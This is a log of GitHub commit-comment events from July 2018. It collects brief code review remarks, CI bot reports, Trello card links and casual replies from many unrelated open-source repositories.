{"id":"7961651207","type":"CommitCommentEvent","actor":{"login":"VanessaSOliveira"},"repo":{"name":"viubis/Eng.-Software"},"payload":{"comment":{"id":29698684,"position":null,"line":null,"path":null,"commit_id":"1b1c22ab73c7dd96f238623fe7e79a7e54ebb15a","created_at":"2018-07-13T11:36:38Z","updated_at":"2018-07-13T11:36:38Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Checar responsividade das telas](https://trello.com/c/Ng1N616T/204-checar-responsividade-das-telas)"}},"created_at":"2018-07-13T11:36:38Z"}
{"id":"7961651722","type":"CommitCommentEvent","actor":{"login":"VanessaSOliveira"},"repo":{"name":"viubis/Eng.-Software"},"payload":{"comment":{"id":29698686,"position":null,"line":null,"path":null,"commit_id":"271ccc9e6d4a2bb4e08602fd718a9dfb85cc7189","created_at":"2018-07-13T11:36:46Z","updated_at":"2018-07-13T11:36:46Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Checar responsividade das telas](https://trello.com/c/Ng1N616T/204-checar-responsividade-das-telas)"}},"created_at":"2018-07-13T11:36:46Z"}
{"id":"7961654377","type":"CommitCommentEvent","actor":{"login":"hadim"},"repo":{"name":"brouhardlab/Kappa"},"payload":{"comment":{"id":29698691,"position":null,"line":null,"path":null,"commit_id":"c82bf5d9522017cdbe5c3e4a50bf338ac0e01ae4","created_at":"2018-07-13T11:37:25Z","updated_at":"2018-07-13T11:37:25Z","author_association":"MEMBER","body":"Can you open an issue please and describe in more detail your error. A link to your file will also be helpful."}},"created_at":"2018-07-13T11:37:25Z"}
{"id":"7961654893","type":"CommitCommentEvent","actor":{"login":"TylerBurnett"},"repo":{"name":"frk1/hazedumper"},"payload":{"comment":{"id":29698693,"position":null,"line":null,"path":null,"commit_id":"59749e4e675adb44ae3af20f195c1107d3cf6b58","created_at":"2018-07-13T11:37:34Z","updated_at":"2018-07-13T11:37:34Z","author_association":"NONE","body":"Anyone else having issues with the changes? Neither my older build or my experimental builds like's these offsets. In cross isn't working, Glow offsets are not working."}},"created_at":"2018-07-13T11:37:34Z"}
{"id":"7961659254","type":"CommitCommentEvent","actor":{"login":"j-balint"},"repo":{"name":"hofrichter/linux"},"payload":{"comment":{"id":29698705,"position":null,"line":null,"path":null,"commit_id":"e0650cc1f5ae1a2bd30aa0fb31a01c344eb5dfd4","created_at":"2018-07-13T11:38:41Z","updated_at":"2018-07-13T11:38:41Z","author_association":"NONE","body":"Hello, your desktop-switcher.sh is exactly the right extension what I would like to use. However I needed some more explanations how to configure and prepare installation before I run the script. I think your description is correct in the desktop-switcher.sh file, however I am not an exerienced  Lx user, and do not understand exactly e.g. where to create the DESKTOP_HOME folder, where to put the names, etc.  \r\n\r\n\r\n\r\n"}},"created_at":"2018-07-13T11:38:41Z"}
{"id":"7961661466","type":"CommitCommentEvent","actor":{"login":"iBublik"},"repo":{"name":"savchenkoDev/TestGuru"},"payload":{"comment":{"id":29698714,"position":6,"line":6,"path":"db/migrate/20180713091646_create_test_passages.rb","commit_id":"1e53fa6b767afad1e0f9afca801f677392506d56","created_at":"2018-07-13T11:39:15Z","updated_at":"2018-07-13T11:39:15Z","author_association":"NONE","body":"`t.references :current_question, foreign_key: { to_table: :questions }` - рельсы имя таблицы вычисляют из references. Вообще это проблема SQLite - он почему-то дает создать заведомо невалдиный внешний ключ. Постгрес бы упал на такой миграции"}},"created_at":"2018-07-13T11:39:15Z"}
{"id":"7961663174","type":"CommitCommentEvent","actor":{"login":"udalov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":29698718,"position":23,"line":126,"path":"compiler/frontend.java/src/org/jetbrains/kotlin/resolve/jvm/checkers/JavaNullabilityChecker.kt","commit_id":"99067d5449280cb7495a7e4941556e0941fe2355","created_at":"2018-07-13T11:39:41Z","updated_at":"2018-07-13T11:39:41Z","author_association":"MEMBER","body":"`receiverExpression` rather"}},"created_at":"2018-07-13T11:39:41Z"}
{"id":"7961666305","type":"CommitCommentEvent","actor":{"login":"djmax81"},"repo":{"name":"kdrag0n/velocity_dream"},"payload":{"comment":{"id":29698724,"position":null,"line":null,"path":null,"commit_id":"81068268e5059fac8d377d3f18fce1c4891716ee","created_at":"2018-07-13T11:40:26Z","updated_at":"2018-07-13T11:40:26Z","author_association":"NONE","body":"Sad you don't want to learn and just use entire directory !"}},"created_at":"2018-07-13T11:40:26Z"}
{"id":"7961666803","type":"CommitCommentEvent","actor":{"login":"TeoTwawki"},"repo":{"name":"DarkstarProject/darkstar"},"payload":{"comment":{"id":29698726,"position":null,"line":null,"path":null,"commit_id":"307321244b9a477f5c925f13ef63ff14012abdbe","created_at":"2018-07-13T11:40:34Z","updated_at":"2018-07-13T11:40:34Z","author_association":"MEMBER","body":"````\r\nlocal leader = player:getPartyLeader()\r\n```\r\n```\r\nleader:isInMogHouse()\r\n```\r\nI derp. leader gonna be nil when not in same map server I needed to change more than the position setting line. Have an idea to fix I can try over the weekend."}},"created_at":"2018-07-13T11:40:34Z"}
{"id":"7961667254","type":"CommitCommentEvent","actor":{"login":"Tqkhan"},"repo":{"name":"Tqkhan/itgs"},"payload":{"comment":{"id":29698727,"position":null,"line":null,"path":null,"commit_id":"a8142d740d6d1070a52702bd2a81a8fe02278dd7","created_at":"2018-07-13T11:40:41Z","updated_at":"2018-07-13T11:40:41Z","author_association":"OWNER","body":"wrwerw"}},"created_at":"2018-07-13T11:40:41Z"}
{"id":"7961668167","type":"CommitCommentEvent","actor":{"login":"3jmaster"},"repo":{"name":"3jmaster/docker-headless-vnc-container"},"payload":{"comment":{"id":29698731,"position":null,"line":null,"path":null,"commit_id":"f30253a51018e47362ade948e8219eda1baccdd2","created_at":"2018-07-13T11:40:53Z","updated_at":"2018-07-13T11:40:53Z","author_association":"OWNER","body":"@toschneck thanks! I'll do that as soon as I fix some scripts"}},"created_at":"2018-07-13T11:40:53Z"}
{"id":"7961671026","type":"CommitCommentEvent","actor":{"login":"ValerieVS"},"repo":{"name":"brouhardlab/Kappa"},"payload":{"comment":{"id":29698743,"position":null,"line":null,"path":null,"commit_id":"c82bf5d9522017cdbe5c3e4a50bf338ac0e01ae4","created_at":"2018-07-13T11:41:33Z","updated_at":"2018-07-13T11:41:33Z","author_association":"NONE","body":"We found the issue, the dimensions (4000x4000px) of the files were too large to open in the plugin. If we reduce it, it works perfectly fine :)! "}},"created_at":"2018-07-13T11:41:33Z"}
{"id":"7961671742","type":"CommitCommentEvent","actor":{"login":"Tqkhan"},"repo":{"name":"Tqkhan/itgs"},"payload":{"comment":{"id":29698746,"position":null,"line":null,"path":null,"commit_id":"a8142d740d6d1070a52702bd2a81a8fe02278dd7","created_at":"2018-07-13T11:41:44Z","updated_at":"2018-07-13T11:41:44Z","author_association":"OWNER","body":"<h1>Talha Q KHan</h1>\r\n<hr/><hr/><hr/><hr/><hr/><hr/>"}},"created_at":"2018-07-13T11:41:44Z"}
{"id":"7961673151","type":"CommitCommentEvent","actor":{"login":"zafarkurbonov"},"repo":{"name":"zafarkurbonov/PLSQL-SQL_Zoo"},"payload":{"comment":{"id":29698749,"position":null,"line":null,"path":null,"commit_id":"70ee8316efce6de063a9993270c9f9f93da44318","created_at":"2018-07-13T11:42:06Z","updated_at":"2018-07-13T11:42:06Z","author_association":"OWNER","body":"Added Solutions to basics of SELECT"}},"created_at":"2018-07-13T11:42:06Z"}
{"id":"7961679041","type":"CommitCommentEvent","actor":{"login":"CharlesMaZ"},"repo":{"name":"feelfreelinux/WykopMobilny"},"payload":{"comment":{"id":29698765,"position":null,"line":null,"path":null,"commit_id":"430ff20824518515a3afb86dcbb8bc3c366606fe","created_at":"2018-07-13T11:43:30Z","updated_at":"2018-07-13T11:43:30Z","author_association":"NONE","body":"łoooo"}},"created_at":"2018-07-13T11:43:30Z"}
{"id":"7961692501","type":"CommitCommentEvent","actor":{"login":"Salaboy"},"repo":{"name":"Activiti/activiti-cloud-org-service"},"payload":{"comment":{"id":29698802,"position":20,"line":34,"path":"activiti-cloud-services-org/activiti-cloud-services-org-jpa/src/main/java/org/activiti/cloud/services/organization/entity/ApplicationEntity.java","commit_id":"44440e902ef9e7cdea56193381a58a0251ab8286","created_at":"2018-07-13T11:46:44Z","updated_at":"2018-07-13T11:46:44Z","author_association":"MEMBER","body":"@Entity(\"Application\") -> so we follow the same convention as on query"}},"created_at":"2018-07-13T11:46:44Z"}
{"id":"7961694721","type":"CommitCommentEvent","actor":{"login":"Profpatsch"},"repo":{"name":"mboes/nixpkgs"},"payload":{"comment":{"id":29698806,"position":5,"line":4,"path":"pkgs/development/tools/build-managers/bazel/default.nix","commit_id":"6bdee9c7300fe415bb74ce93e45fd880445b18c7","created_at":"2018-07-13T11:47:20Z","updated_at":"2018-07-13T11:47:20Z","author_association":"NONE","body":"@abbradar `buildBazelPackage` has some bash code for changing markers, what’s the reason it doesn’t use a bazel with nix hacks enabled instead? That bazel needs to be rebuild?"}},"created_at":"2018-07-13T11:47:20Z"}
{"id":"7961697433","type":"CommitCommentEvent","actor":{"login":"LaszloLango"},"repo":{"name":"TamasZakor/jerryscript"},"payload":{"comment":{"id":29698813,"position":97,"line":1329,"path":"jerry-core/api/jerry-snapshot.c","commit_id":"3798462f8fd598385067e1d7195e267ebd312b78","created_at":"2018-07-13T11:47:58Z","updated_at":"2018-07-13T11:47:58Z","author_association":"NONE","body":"Why?"}},"created_at":"2018-07-13T11:47:58Z"}
{"id":"7961700370","type":"CommitCommentEvent","actor":{"login":"caiyuanzi2018"},"repo":{"name":"eostoken/wallet"},"payload":{"comment":{"id":29698820,"position":null,"line":null,"path":null,"commit_id":"f76e9389bcbf4eec81d000ed24c9699611b6b699","created_at":"2018-07-13T11:48:40Z","updated_at":"2018-07-13T11:48:40Z","author_association":"NONE","body":"PASS"}},"created_at":"2018-07-13T11:48:40Z"}
{"id":"7961701942","type":"CommitCommentEvent","actor":{"login":"NNeast"},"repo":{"name":"feelfreelinux/WykopMobilny"},"payload":{"comment":{"id":29698822,"position":null,"line":null,"path":null,"commit_id":"430ff20824518515a3afb86dcbb8bc3c366606fe","created_at":"2018-07-13T11:49:06Z","updated_at":"2018-07-13T11:49:06Z","author_association":"NONE","body":"Gz"}},"created_at":"2018-07-13T11:49:06Z"}
{"id":"7961711534","type":"CommitCommentEvent","actor":{"login":"kirotnes"},"repo":{"name":"palaah/tibber-smartthings-app"},"payload":{"comment":{"id":29698844,"position":5,"line":100,"path":"src/Device handlers/tibber-price-device-handler.groovy","commit_id":"f7608db930729c4f95959116a51fbe57fad95ef3","created_at":"2018-07-13T11:51:31Z","updated_at":"2018-07-13T11:51:31Z","author_association":"NONE","body":"Think @palaah is aware of this since he has deleted this key. "}},"created_at":"2018-07-13T11:51:31Z"}
{"id":"7961712834","type":"CommitCommentEvent","actor":{"login":"aabbccsmith"},"repo":{"name":"Sodex234/spacegame"},"payload":{"comment":{"id":29698845,"position":null,"line":null,"path":null,"commit_id":"1219a6926d5edda6ed7923ac3713648fee0c5987","created_at":"2018-07-13T11:51:52Z","updated_at":"2018-07-13T11:51:52Z","author_association":"NONE","body":"# notice\n**but can you make it so** _it works_  ~~on all~~ devices\n\n- [x] thanks\n- [ ]  okay\n- [ ]  yeah\n\n```\nwowee\n```\n"}},"created_at":"2018-07-13T11:51:52Z"}
{"id":"7961715589","type":"CommitCommentEvent","actor":{"login":"inventiphGuru"},"repo":{"name":"inventiphGuru/MyDiary"},"payload":{"comment":{"id":29698849,"position":null,"line":null,"path":null,"commit_id":"62c51db30ec16fb6768723d5b6a9537c4462db80","created_at":"2018-07-13T11:52:32Z","updated_at":"2018-07-13T11:52:32Z","author_association":"OWNER","body":"with updated styling sheet"}},"created_at":"2018-07-13T11:52:32Z"}
{"id":"7961726071","type":"CommitCommentEvent","actor":{"login":"pplutap"},"repo":{"name":"agammkrawczyk/agnieszkakrawczyk"},"payload":{"comment":{"id":29698865,"position":23,"line":16,"path":"kodilla-stream/src/main/java/com/kodilla/stream/StreamMain.java","commit_id":"7d7e9762a6daa95db50e0b5805825e4d881327f4","created_at":"2018-07-13T11:55:03Z","updated_at":"2018-07-13T11:55:03Z","author_association":"NONE","body":"Nie można porównywać z rokiem 1998. Jeśli data się zmieni np będzie rok 2020, wynik będzie błędny"}},"created_at":"2018-07-13T11:55:03Z"}
{"id":"7961727996","type":"CommitCommentEvent","actor":{"login":"bnchdrff"},"repo":{"name":"steemit/condenser"},"payload":{"comment":{"id":29698871,"position":null,"line":null,"path":null,"commit_id":"a35d519a13d2763d93d89d2ea4a578a90d319ab6","created_at":"2018-07-13T11:55:29Z","updated_at":"2018-07-13T11:55:29Z","author_association":"CONTRIBUTOR","body":"are these going to be added back in?"}},"created_at":"2018-07-13T11:55:29Z"}
{"id":"7961733099","type":"CommitCommentEvent","actor":{"login":"rishabhkalra96"},"repo":{"name":"rishabhkalra96/PWA_Example"},"payload":{"comment":{"id":29698878,"position":null,"line":null,"path":null,"commit_id":"24947b1d789fbf9541dd1b5026c48ea2d763d6d2","created_at":"2018-07-13T11:56:41Z","updated_at":"2018-07-13T11:56:41Z","author_association":"OWNER","body":"The above code sample explains how to setup your cache and store file in it so that it can be retrieved later.\r\nwe used waitUntil() process because we know that we are performing async task and we dont want that any other process tries to access the cache before even opening it. So, in some sense we are forcing the service worker to stay synchronized and not get installed unless, everything is okay and the cache is set up."}},"created_at":"2018-07-13T11:56:41Z"}
{"id":"7961733597","type":"CommitCommentEvent","actor":{"login":"omelhus"},"repo":{"name":"palaah/tibber-smartthings-app"},"payload":{"comment":{"id":29698880,"position":5,"line":100,"path":"src/Device handlers/tibber-price-device-handler.groovy","commit_id":"f7608db930729c4f95959116a51fbe57fad95ef3","created_at":"2018-07-13T11:56:47Z","updated_at":"2018-07-13T11:56:47Z","author_association":"NONE","body":"Ok, good. Didn't want to test it."}},"created_at":"2018-07-13T11:56:47Z"}
{"id":"7961736875","type":"CommitCommentEvent","actor":{"login":"Jako"},"repo":{"name":"modxcms/revolution"},"payload":{"comment":{"id":29698888,"position":4,"line":364,"path":"manager/assets/modext/workspace/package.grid.js","commit_id":"91988569b00b04b68f14776e5fc06eeaedd2eba1","created_at":"2018-07-13T11:57:33Z","updated_at":"2018-07-13T11:57:33Z","author_association":"COLLABORATOR","body":"Maybe the window should be destroyed directly after this.install https://github.com/modxcms/revolution/blob/91988569b00b04b68f14776e5fc06eeaedd2eba1/manager/assets/modext/workspace/package.grid.js#L384 or set the closeAction of that window to 'destroy'. The MODx.window closeAction defaults to 'close'"}},"created_at":"2018-07-13T11:57:33Z"}
{"id":"7961737455","type":"CommitCommentEvent","actor":{"login":"ztlpn"},"repo":{"name":"yandex/ClickHouse"},"payload":{"comment":{"id":29698890,"position":48,"line":1024,"path":"dbms/src/Common/ZooKeeper/ZooKeeperImpl.cpp","commit_id":"c315200e64b87e44bdf740707fc857d1fdf7e947","created_at":"2018-07-13T11:57:41Z","updated_at":"2018-07-13T11:57:41Z","author_association":"CONTRIBUTOR","body":"In a rare case (exception in makeResponse()) response can be nullptr."}},"created_at":"2018-07-13T11:57:41Z"}
{"id":"7961738399","type":"CommitCommentEvent","actor":{"login":"iopietro"},"repo":{"name":"Shadowss/TravianZ"},"payload":{"comment":{"id":29698892,"position":null,"line":null,"path":null,"commit_id":"dc399437d0b6a35efcaeff0ef857089150a78393","created_at":"2018-07-13T11:57:55Z","updated_at":"2018-07-13T11:57:55Z","author_association":"COLLABORATOR","body":"Good job, it looks great! If you want, you can add that little bug to the big bugs list."}},"created_at":"2018-07-13T11:57:55Z"}
{"id":"7961741129","type":"CommitCommentEvent","actor":{"login":"Arnish"},"repo":{"name":"ExtraConcentratedJuice/pokecord-catcher"},"payload":{"comment":{"id":29698896,"position":null,"line":null,"path":null,"commit_id":"2966c7ed6444802fd5bd721e85ed08b5ac4af428","created_at":"2018-07-13T11:58:35Z","updated_at":"2018-07-13T11:58:35Z","author_association":"NONE","body":"Yep everything works now, guess I downloaded the old one for some reason. Thanks a bunch, I appreciate it!!!"}},"created_at":"2018-07-13T11:58:35Z"}
{"id":"7961741211","type":"CommitCommentEvent","actor":{"login":"dividedmind"},"repo":{"name":"cyberark/conjur"},"payload":{"comment":{"id":29698897,"position":null,"line":null,"path":null,"commit_id":"e8a2aa77c19849d1a73b5312016c1d1ccdec94fc","created_at":"2018-07-13T11:58:36Z","updated_at":"2018-07-13T11:58:36Z","author_association":"CONTRIBUTOR","body":"I don't understand the reason for this change. \r\nIt forces you to run cucumber from the project root. This is especially cumbersome when you're developing and want to manually run just a single feature."}},"created_at":"2018-07-13T11:58:36Z"}
{"id":"7961741310","type":"CommitCommentEvent","actor":{"login":"WilliamHolmes"},"repo":{"name":"WilliamHolmes/watsonwork-smbc-bot"},"payload":{"comment":{"id":29698899,"position":null,"line":null,"path":null,"commit_id":"63429036c6494ad0746222b5a03fe1542ac98f94","created_at":"2018-07-13T11:58:38Z","updated_at":"2018-07-13T11:58:38Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/59483139-581b-420d-90f0-d1a4f85c757d?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-smbc-bot\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/60053b78-cf64-42ea-8ce3-3ba3ce629cf0?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-smbc-bot\") deployed [watsonwork-smbc-bot](https://github.com/WilliamHolmes/watsonwork-smbc-bot/releases/tag/deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180713-115836 \"deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180713-115836\") to [dev](https://console.bluemix.net/apps/614b28c8-bbda-4a4b-b0da-a51b1e3ed64a?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:holmesw@ie.ibm.com:dev\"), including this commit"}},"created_at":"2018-07-13T11:58:38Z"}
{"id":"7961752923","type":"CommitCommentEvent","actor":{"login":"Ashleyzawadi"},"repo":{"name":"Ashleyzawadi/Image-Gallery"},"payload":{"comment":{"id":29698922,"position":1,"line":1,"path":"README.md","commit_id":"8ed1aed8d187ac5b714f7212a780083e2bd6a048","created_at":"2018-07-13T12:01:18Z","updated_at":"2018-07-13T12:01:18Z","author_association":"OWNER","body":"![lumierereadme](https://user-images.githubusercontent.com/36164543/42690549-4cabaddc-86ad-11e8-81ff-29a2f4fcadcc.png)\r\n![posts](https://user-images.githubusercontent.com/36164543/42690564-5c5dc954-86ad-11e8-8511-8d298d26cd18.png)\r\n![modalview](https://user-images.githubusercontent.com/36164543/42690571-67e8ac6c-86ad-11e8-9dbd-da8e47bb0dae.png)\r\n"}},"created_at":"2018-07-13T12:01:18Z"}
{"id":"7961753515","type":"CommitCommentEvent","actor":{"login":"kamihouse"},"repo":{"name":"LKDevelopment/drakov"},"payload":{"comment":{"id":29698923,"position":null,"line":null,"path":null,"commit_id":"a3e359071fd89b35551cd9ab6d06d2c7fa335df2","created_at":"2018-07-13T12:01:26Z","updated_at":"2018-07-13T12:01:26Z","author_association":"NONE","body":"Your solution very interesting!"}},"created_at":"2018-07-13T12:01:26Z"}
{"id":"7961754696","type":"CommitCommentEvent","actor":{"login":"taoWcode"},"repo":{"name":"taoWcode/fuhuafazhan"},"payload":{"comment":{"id":29698930,"position":null,"line":null,"path":null,"commit_id":"5d53ac208347b91a69113ec291c5af3bd4af4a76","created_at":"2018-07-13T12:01:44Z","updated_at":"2018-07-13T12:01:44Z","author_association":"OWNER","body":"跟随者提交"}},"created_at":"2018-07-13T12:01:44Z"}
{"id":"7961756361","type":"CommitCommentEvent","actor":{"login":"apeteri"},"repo":{"name":"b2ihealthcare/snow-owl"},"payload":{"comment":{"id":29698933,"position":null,"line":null,"path":null,"commit_id":"ccfc4f8c10fc5de544b29a0674c1bb45aa9ff489","created_at":"2018-07-13T12:02:09Z","updated_at":"2018-07-13T12:02:09Z","author_association":"MEMBER","body":"👍 "}},"created_at":"2018-07-13T12:02:09Z"}
{"id":"7961757782","type":"CommitCommentEvent","actor":{"login":"cmark"},"repo":{"name":"b2ihealthcare/snow-owl"},"payload":{"comment":{"id":29698935,"position":null,"line":null,"path":null,"commit_id":"ccfc4f8c10fc5de544b29a0674c1bb45aa9ff489","created_at":"2018-07-13T12:02:29Z","updated_at":"2018-07-13T12:02:29Z","author_association":"MEMBER","body":"🏆 "}},"created_at":"2018-07-13T12:02:29Z"}
{"id":"7961761976","type":"CommitCommentEvent","actor":{"login":"victoriaogomes"},"repo":{"name":"viubis/Eng.-Software"},"payload":{"comment":{"id":29698954,"position":null,"line":null,"path":null,"commit_id":"ea88ededcfd49c40f92e696c7dae62cdf5d406a8","created_at":"2018-07-13T12:03:26Z","updated_at":"2018-07-13T12:03:26Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Refatoração das telas (Remoção de erros)](https://trello.com/c/imXGiTQq/198-refatora%C3%A7%C3%A3o-das-telas-remo%C3%A7%C3%A3o-de-erros)"}},"created_at":"2018-07-13T12:03:26Z"}
{"id":"7961762546","type":"CommitCommentEvent","actor":{"login":"victoriaogomes"},"repo":{"name":"viubis/Eng.-Software"},"payload":{"comment":{"id":29698958,"position":null,"line":null,"path":null,"commit_id":"6e10367475ef323e78ef70cddcbf0972be5415bc","created_at":"2018-07-13T12:03:33Z","updated_at":"2018-07-13T12:03:33Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Refatoração das telas (Remoção de erros)](https://trello.com/c/imXGiTQq/198-refatora%C3%A7%C3%A3o-das-telas-remo%C3%A7%C3%A3o-de-erros)"}},"created_at":"2018-07-13T12:03:33Z"}
{"id":"7961763452","type":"CommitCommentEvent","actor":{"login":"taskcluster[bot]"},"repo":{"name":"nss-dev/nss"},"payload":{"comment":{"id":29698961,"position":null,"line":null,"path":null,"commit_id":"89951f060737d70d8c946ca24da90d4d0f2fdb61","created_at":"2018-07-13T12:03:47Z","updated_at":"2018-07-13T12:03:47Z","author_association":"NONE","body":"<details>\n\n<summary>Submitting the task to Taskcluster failed. Details</summary>\n\n\nSchema Validation Failed!\nRejecting Schema: https://schemas.taskcluster.net/github/v1/taskcluster-github-config.json#\nErrors:\n  * data should NOT have additional properties: \"scopes\"\n  * data.metadata.source should be string\n\n</details>"}},"created_at":"2018-07-13T12:03:47Z"}
{"id":"7961767912","type":"CommitCommentEvent","actor":{"login":"ChalapathiRevanth"},"repo":{"name":"ChalapathiRevanth/device_xiaomi_rosy"},"payload":{"comment":{"id":29698964,"position":null,"line":null,"path":null,"commit_id":"2b75ccf4d31cca880629a47e60d4d6cad44c6a3d","created_at":"2018-07-13T12:04:46Z","updated_at":"2018-07-13T12:04:46Z","author_association":"OWNER","body":"Kindly Dont Think it is a Kang! Once i Find the Proper Author I Will Revert this commit and pick it"}},"created_at":"2018-07-13T12:04:46Z"}
{"id":"7961774186","type":"CommitCommentEvent","actor":{"login":"pexcn"},"repo":{"name":"felixonmars/dnsmasq-china-list"},"payload":{"comment":{"id":29698972,"position":4,"line":2939,"path":"accelerated-domains.china.conf","commit_id":"f0a238568273d7f9039eebc9ca303b2db5588de4","created_at":"2018-07-13T12:06:19Z","updated_at":"2018-07-13T12:06:19Z","author_association":"NONE","body":"感谢。"}},"created_at":"2018-07-13T12:06:19Z"}
{"id":"7961774899","type":"CommitCommentEvent","actor":{"login":"njels"},"repo":{"name":"njels/react"},"payload":{"comment":{"id":29698974,"position":null,"line":null,"path":null,"commit_id":"2ef13331a59262147efcc23613d25d0e8f581747","created_at":"2018-07-13T12:06:29Z","updated_at":"2018-07-13T12:06:29Z","author_association":"OWNER","body":"bla"}},"created_at":"2018-07-13T12:06:29Z"}
{"id":"7961781846","type":"CommitCommentEvent","actor":{"login":"Kokan"},"repo":{"name":"balabit/syslog-ng"},"payload":{"comment":{"id":29698987,"position":160,"line":302,"path":"modules/redisq/logqueue-redis.c","commit_id":"e70ba90223ce22f756ed2938540d4d69fb63a534","created_at":"2018-07-13T12:08:06Z","updated_at":"2018-07-13T12:08:06Z","author_association":"MEMBER","body":"At least one reconnection should trial should be made, because currently if once a connection is severed it won't connect again.\r\nSomething like this:\r\n```C\r\nif (!redis_check_connection_alive(self))\r\n  {\r\n     if (!redis_reconnect(self))\r\n       {\r\n             msg_error(\"Message was dropped, because there is no redis connection\");\r\n             return NULL;\r\n       }\r\n}\r\n```"}},"created_at":"2018-07-13T12:08:06Z"}
{"id":"7961788561","type":"CommitCommentEvent","actor":{"login":"dividedmind"},"repo":{"name":"cyberark/conjur"},"payload":{"comment":{"id":29698997,"position":null,"line":null,"path":null,"commit_id":"e8a2aa77c19849d1a73b5312016c1d1ccdec94fc","created_at":"2018-07-13T12:09:44Z","updated_at":"2018-07-13T12:09:44Z","author_association":"CONTRIBUTOR","body":"Also, moving `require 'config/environment'` before the `RAILS_ENV` line effectively deactivates the latter."}},"created_at":"2018-07-13T12:09:44Z"}
{"id":"7961791928","type":"CommitCommentEvent","actor":{"login":"sfan02"},"repo":{"name":"USEPA/EPA_Express_Code"},"payload":{"comment":{"id":29699005,"position":null,"line":null,"path":null,"commit_id":"57af9a6eb6ab8a54ef885d2f6a38b00cedb5df6a","created_at":"2018-07-13T12:10:32Z","updated_at":"2018-07-13T12:10:32Z","author_association":"CONTRIBUTOR","body":"Removed cpr."}},"created_at":"2018-07-13T12:10:32Z"}
{"id":"7961797571","type":"CommitCommentEvent","actor":{"login":"Kokan"},"repo":{"name":"balabit/syslog-ng"},"payload":{"comment":{"id":29699025,"position":160,"line":302,"path":"modules/redisq/logqueue-redis.c","commit_id":"e70ba90223ce22f756ed2938540d4d69fb63a534","created_at":"2018-07-13T12:11:52Z","updated_at":"2018-07-13T12:11:52Z","author_association":"MEMBER","body":"Also a side note, for long term. (Not a change for now.) The connection check actually ping the redis end point, so every save message is at least two redis connection, and that most likely has performance impact. Some kinda reasoning can be made to generate less redis traffic."}},"created_at":"2018-07-13T12:11:52Z"}
{"id":"7961799777","type":"CommitCommentEvent","actor":{"login":"paulina-bukowska"},"repo":{"name":"paulina-bukowska/my_testing"},"payload":{"comment":{"id":29699032,"position":null,"line":null,"path":null,"commit_id":"ca3b35e356d248c91c62a729773b27be8f029653","created_at":"2018-07-13T12:12:22Z","updated_at":"2018-07-13T12:12:22Z","author_association":"OWNER","body":"**Task description**\r\n\r\nA non-empty array A consisting of N integers is given. The consecutive elements of array A represent consecutive cars on a road.\r\n\r\nArray A contains only 0s and/or 1s:\r\n\r\n0 represents a car traveling east,\r\n1 represents a car traveling west.\r\nThe goal is to count passing cars. We say that a pair of cars (P, Q), where 0 ≤ P < Q < N, is passing when P is traveling to the east and Q is traveling to the west.\r\n\r\nFor example, consider array A such that:\r\n\r\n  A[0] = 0\r\n  A[1] = 1\r\n  A[2] = 0\r\n  A[3] = 1\r\n  A[4] = 1\r\nWe have five pairs of passing cars: (0, 1), (0, 3), (0, 4), (2, 3), (2, 4).\r\n\r\nWrite a function:\r\n\r\nclass Solution { public int solution(int[] A); }\r\n\r\nthat, given a non-empty array A of N integers, returns the number of pairs of passing cars.\r\n\r\nThe function should return −1 if the number of pairs of passing cars exceeds 1,000,000,000.\r\n\r\nFor example, given:\r\n\r\n  A[0] = 0\r\n  A[1] = 1\r\n  A[2] = 0\r\n  A[3] = 1\r\n  A[4] = 1\r\nthe function should return 5, as explained above.\r\n\r\nAssume that:\r\n\r\nN is an integer within the range [1..100,000];\r\neach element of array A is an integer that can have one of the following values: 0, 1.\r\nComplexity:\r\n\r\nexpected worst-case time complexity is O(N);\r\nexpected worst-case space complexity is O(1) (not counting the storage required for input arguments)."}},"created_at":"2018-07-13T12:12:22Z"}
{"id":"7961802238","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29699034,"position":null,"line":null,"path":null,"commit_id":"dc2fc3994f93274ddce3cef6177a1b5ecb0c5863","created_at":"2018-07-13T12:12:57Z","updated_at":"2018-07-13T12:12:57Z","author_association":"NONE","body":"159013173_Issue#6243 (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2314 of 2314 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-dc2fc3994f93274ddce3cef6177a1b5ecb0c5863-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-dc2fc3994f93274ddce3cef6177a1b5ecb0c5863-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-dc2fc3994f93274ddce3cef6177a1b5ecb0c5863-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.2%25-green.png)</a>\n"}},"created_at":"2018-07-13T12:12:57Z"}
{"id":"7961803226","type":"CommitCommentEvent","actor":{"login":"elhigu"},"repo":{"name":"tgriesser/knex"},"payload":{"comment":{"id":29699035,"position":null,"line":null,"path":null,"commit_id":"3aa811fa9d686515fb5b374f2c86d707425f62b4","created_at":"2018-07-13T12:13:11Z","updated_at":"2018-07-13T12:13:11Z","author_association":"COLLABORATOR","body":"This actually breaks the workflow when one is running watch on background and then just running test separately against sources, which were compiled by watch. There is still demand to have task for running the tests without building first."}},"created_at":"2018-07-13T12:13:11Z"}
